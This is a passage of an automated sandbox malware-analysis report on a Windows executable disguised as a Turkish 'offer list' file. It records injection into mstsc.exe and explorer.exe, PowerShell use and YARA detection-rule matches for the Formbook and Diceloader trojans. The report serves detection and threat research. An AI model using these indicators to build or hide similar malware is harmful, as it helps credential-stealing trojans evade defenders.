          Source: C:\Windows\explorer.exeCode function: 6_2_0EA092326_2_0EA09232
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA03B306_2_0EA03B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA03B326_2_0EA03B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E9FF0826_2_0E9FF082
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA080366_2_0EA08036
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA0C5CD6_2_0EA0C5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA00D026_2_0EA00D02
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA069126_2_0EA06912
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008390908_2_00839090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008210A08_2_008210A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007750018_2_00775001
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A60E08_2_007A60E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007FE2508_2_007FE250
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007D14288_2_007D1428
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007774C88_2_007774C8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007CC6508_2_007CC650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008218E08_2_008218E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007788068_2_00778806
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007FB8B68_2_007FB8B6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A0AC38_2_007A0AC3
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007B2AA78_2_007B2AA7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007C6D108_2_007C6D10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00777E088_2_00777E08
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00887F3A8_2_00887F3A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00798FC18_2_00798FC1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C2E4F68_2_04C2E4F6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C324468_2_04C32446
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C244208_2_04C24420
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C405918_2_04C40591
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04B805358_2_04B80535
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04B9C6E08_2_04B9C6E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04B7C7C08_2_04B7C7C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04B807708_2_04B80770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04BA47508_2_04BA4750
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C120008_2_04C12000
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C381CC8_2_04C381CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C341A28_2_04C341A2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C401AA8_2_04C401AA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C081588_2_04C08158
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04B701008_2_04B70100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C1A1188_2_04C1A118
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C002C08_2_04C002C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C202748_2_04C20274
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C403E68_2_04C403E6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04B8E3F08_2_04B8E3F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04C3A3528_2_04C3A352
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_04B70CF28_2_04B70CF2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01B97E54 appears 102 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01B85130 appears 58 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01BCF290 appears 105 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01BBEA12 appears 86 times
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: String function: 01B3B970 appears 278 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04BEEA12 appears 34 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0079AE27 appears 37 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00798010 appears 1004 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 007EE06D appears 31 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00883E7C appears 305 times
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1551226317.000000000124E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1561410656.0000000009080000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1559881227.0000000007515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000000.00000000.1537507476.0000000000C98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamerFP.exe^ vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000038C2000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001C3D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exeBinary or memory string: OriginalFilenamerFP.exe^ vs TEKL#U0130F #U0130ST.exe
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1623721118.00000000011EF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000006.00000002.2823254798.000000000DEC4000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 6148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 4260, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: mstsc.exe PID: 3900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, cCXDhPnYieu7sLXkQZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, cCXDhPnYieu7sLXkQZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.csSecurity API names: _0020.AddAccessRule
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/6@6/1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00813699 memset,memset,CreateThread,GetLastError,CloseHandle,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree,8_2_00813699
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007E8051 GetModuleFileNameW,GetLastError,wcsrchr,GetCurrentProcessId,SysAllocString,SysAllocString,CoCreateInstance,8_2_007E8051
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008862D5 FindResourceExW,LoadResource,8_2_008862D5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F #U0130ST.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqs2e3jc.x4i.ps1Jump to behavior
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: TEKL#U0130F #U0130ST.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
